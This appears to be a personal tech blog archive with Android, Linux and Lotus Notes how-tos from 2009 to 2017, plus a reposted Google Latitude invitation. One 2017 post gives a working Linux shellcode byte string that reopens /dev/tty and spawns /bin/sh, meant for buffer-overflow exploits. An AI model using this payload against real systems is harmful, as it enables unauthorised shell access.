12 March 2017

Shellcode that bring back tty input



There are cases that you think you have been able to exploit the bug (e.g. buffer-overflow) but the program is terminated right away. You have nothing to do with your shell-code.
One of the reasons is your shell-code does not bring back the input terminal so you can not type your commands.
The solution is to try with another shell-code, like the one below. It will "closes stdin descriptor and re-opens /dev/tty, then does an execve() of /bin/sh/".
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Origin

25 February 2011

Gingerbread (Android 2.3.3) for Nexus One - GRI40


I just could not wait until my phone get the OTA update from Google. :p

So, I decided update it manually.

And, here is the link for the one who wants to taste the latest gingerbread (Android 2.3.3 - GRI40).
(for the Nexus One that using Froyo-FRG83G only).

If you got the failed message while updating, maybe you could update the Hboot first.(the required version of Hboot is 0.35.0017 )
Enjoy!


20 June 2010

Latest of Android 2.2 Froyo - FRF72


I've just updated my N1 to the latest of Android 2.2 (Froyo), build number: FRF72.

You can find the official release package on the Google server, here:

(Requirement: you are running Froyo FRF50!)


08 April 2010

How to change SMSC number of Android

Changing SMSC (Short Message Service Center) is necessary when you go to another country (for biz trip or traveling) and still want to send SMS (SMS roaming).

Basically, Android phone have NO setting or application to do this. But, I found a tip.

Here you are:

1. Go to Phone Dialer, and press: *#*#4636#*#*
2. Select Phone information
3. Scroll down to bottom of the screen, you'll see the field for SMSC setting.
4. [Optional] Click Refresh to see current SMSC number.
5. Change the SMSC number as you want. Then, click Update.

That's it!

P/S: I checked on my Nexus One. Maybe, in other Android phones, it's a little bit difference. But, the code is the same: *#*#4636#*#*

05 January 2010

Auto-shutdown for Linux machine

If you want to schedule more than just a shutdown, crontab is the tool generally used for running commands on a recurring schedule.

You should to be root:

# su
Then, type the root's password

Password:
Then, use this command:

# crontab -e
Add the following line:

55 18 * * /sbin/shutdown -h 19:00

It will auto-shutdown computer at 19:00 (after prompt users at 18:55) everyday.

To make it works immediately, you need to restart cron service:

# /etc/init.d/crond restart

That's it. :)

03 November 2009

Setting proxy for Android by GUI (official way)

UPDATE: [2010-05-21] It works with Froyo (Android 2.2)

If you read my earlier post, maybe you already known the way to set proxy for Android (1.6 and earlier versions).

But, that is "un-official way", you need to modify something (the settings.db file) in core system of Android, and you must "restart" emulator to make it available.

Now, I found a new way, such a very simple way (I don't know why I haven't found it before). You can use GUI of Android to set proxy, and it works immediately.

(Note: this guide line for all versions before 2.0 only. It NOT works with Eclair, and I don't know the reason >"<. [---Update: It works with Froyo---] ) 1. Firstly, go to Settings menu, then select Wireless controls



2. In the Wireless controls menu, select Mobile networks,



3. Then, select Access Point Names


4. Press Menu hard key, then select New APN


5. Fill information of your proxy, ex:


Name: YourProxyName
APN: internet
Proxy: your.proxy.server.com
Port: 8080

(You can use your own proxy host and port for Proxy and Port fields)

6. Press Menu hard key, then select Save.


7. You will be returned to Mobile network settings menu, you need to select Access Point Names again and select your new APN to activate it.


8. Press Home hard key to return Home screen. Go to Browser application.
Now, you can use your own proxy for Android browser.



Have fun! ^^

15 September 2009

How to get EMMA code coverage of Android

Here are some basic steps How to get Emma code coverage of Android.

Thanks to Brett Chabot and Gabor for useful support at Android Developer Group

Before doing these steps, you need to get full source code of Android (follow this link for more details )

After that, go to root folder of Android source code and do extractly this instruction below.

A. Generating code coverage using runtest script

1. Firstly, you need to add the target system/framework/emma.jar to the device's boot classpath. So that, modify the BOOTCLASSPATH variable in /system/core/rootdir/init.rc .

a. Open /system/core/rootdir/init.rc

b. The system/framework/emma.jar entry needs to be added in the exact position shown below:
export BOOTCLASSPATH=/system/framework/core.jar:/system/framework/ext.jar:/system/framework/emma.jar:/system/framework/framework.jar:/system/framework/android.policy.jar:/system/framework/services.jar

c. Save and close init.rc file

2. Since EMMA will save the coverage result into SDCard, you need to ensure that the SDCard can be mounted properly. So that,

a. Open this file: build/core/main.mk

b. Ensure that these lines have already added (around line number 212 to 219), if not, do it by yourself!
# Install a vold.conf file is one's not already being installed.
ifeq (,$(filter %:system/etc/vold.conf, $(PRODUCT_COPY_FILES)))
PRODUCT_COPY_FILES += \
development/data/etc/vold.conf:system/etc/vold.conf
ifeq ($(filter eng tests,$(TARGET_BUILD_VARIANT)),)
$(warning implicitly installing vold.conf)
endif
endif

(Please follow this link for more details )

3. Build the bootimage to pick up the init.rc changes
make bootimage

4. Build a full system image
make -j4

5. Make EMMA
export EMMA_INSTRUMENT=true

make emma

6. Start emulator
[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]

7. Next, use the runtest.py script. Runtest will do all the necessary steps to instrument your test and target package, run the test, and generate the code coverage report.
cd [path_to_android_source_code]

python development/testrunner/runtest.py --coverage [Test_package]

[Test_package] can be: apidemos, core, music, email... (Leave this option null to see the list).

8. After finish this script, the coverage report will be generated and saved into

[path_to_Android_source_code]/out/emma/

folder. You can find a html report of EMMA code coverage for [Test_package] there.

=========================================================

B. Generating code coverage for your own test

If you want to running code coverage for your own test, please follow steps as described above, but skip step 6 to 8, continue with step 9 (after step 5) shown below:

9. Setting the environment and additional bash commands. (like m,mm,mmm, choosecombo etc) Notice the space after the dot!
. build/envsetup.sh

10. Set the ANDROID_PRODUCT_OUT directory for the emulator to know the image location
export ANDROID_PRODUCT_OUT=[path_to_Android_source_code]/out/target/product/generic

This step is important. The emulator will know where are the images it need to be synchronized with.

11. Set EMMA_INSTRUMENTATION to true
export EMMA_INSTRUMENT=true

12. Compile the Application would like to instrument
mmm development/samples/[your_project]

(You can use apidemos for example)

After run this step, new images can be generated and saved into ANDROID_PRODUCT_OUT (in step 10)

13. Run emulator
[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]

14. Remount the drive - it is needed to have a writable drive. without that sync wont work
adb remount

15. Synchronize the local content (new images) with the emulator
adb sync

16. Run instrumentation
adb shell am instrument -w -e coverage true [source_code_of_test]

Here is example for apidemos
adb shell am instrument -w -e coverage true com.example.android.apis.tests/android.test.InstrumentationTestRunner

See this for more details of InstrumentationTestRunner options.

17. This command will dump a runtime coverage data file at /sdcard/coverage.ec on the device.

Extract it to local host
adb pull /sdcard/coverage.ec coverage.ec

18. Now generate a coverage report. You'll need to pass in the path to the coverage metadata generated at build time.
java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp [path_to_your_project_source_code] -in out/target/common/obj/APPS/[your_project]_intermediates/coverage.em

Here is example for apidemos:
java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp development/samples/ApiDemos/src -in out/target/common/obj/APPS/ApiDemos_intermediates/coverage.em

19. Now, you will get the HTML report of EMMA code coverage for your own project.

Check it out!


Notes: In the first time running instrumentation (step 7 or 16) the Android system may be crashed. But, don't worry, it will automatically restart. Then, you can run the instrumentation again successfully!

How to set proxy for Android (updated for 1.5 and 1.6_r1 versions)

Here is a tutorial to reconfigure settings of Android , to use proxy for Internet connections.
Basically, we need to modify content of settings.db file in /data/data/com.android.providers.settings/databases/ of Android.

So, we can follow these steps:

1. Go into SDK tools folder
cd [path_to_SDK_folder]/tools
then start emulator.

2. Get settings.db file from Android:
adb pull /data/data/com.android.providers.settings/databases/settings.db settings.db
3. Use SQLite3 to modify it:

a. If you are using Android SDK version 1.1 or lower,
then use:
sqlite3 settings.db "INSERT INTO system VALUES(99,'http_proxy','[proxy_host]:[proxy_port]');"
b. If you are using Android SDK version 1.5 or higher
then use:
sqlite3 settings.db "INSERT INTO secure (name, value) VALUES('http_proxy','[proxy_host]:[proxy_port]');"
4. Put it back into Android:
adb push settings.db /data/data/com.android.providers.settings/databases/settings.db
5. Restart emulator. Then we can use proxy setting for Internet connections.

Lotus Notes: This database cannot be read due to an invalid on disk structure

Error message: "This database cannot be read due to an invalid on disk structure".

How to fix it?

1. Open Workspace by clicking icon on the left side
2. Right click to Email Icon (Local) on Workspace --> "Remove From Workspace"
3. Right click to Email Icon (Server) again--> "Replication" --> "New Replica..."
4. Select a new file or replace the old one to replicate database from server to local
5. Waiting...
6. When replicating finished --> Have fun!

31 May 2009

Duy KHUONG wants to share their location with you on Google Latitude

Duy KHUONG (duykham@gmail.com) wants to start sharing their location with you on Google Latitude. You need to sign in to Latitude with a Google Account (e.g., @gmail.com) and invite Duy KHUONG. To get started, or to learn more about Latitude, click the link below. To get Google Latitude on your phone, click or type in the link below from your mobile web browser.

http://m.google.com/latitude?dc=lati

(c) 2009 Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA. Terms of Service | Privacy Policy

Shellcode that bring back tty input

There are cases that you think you have been able to exploit the bug (e.g. buffer-overflow) but the program is terminated right awa...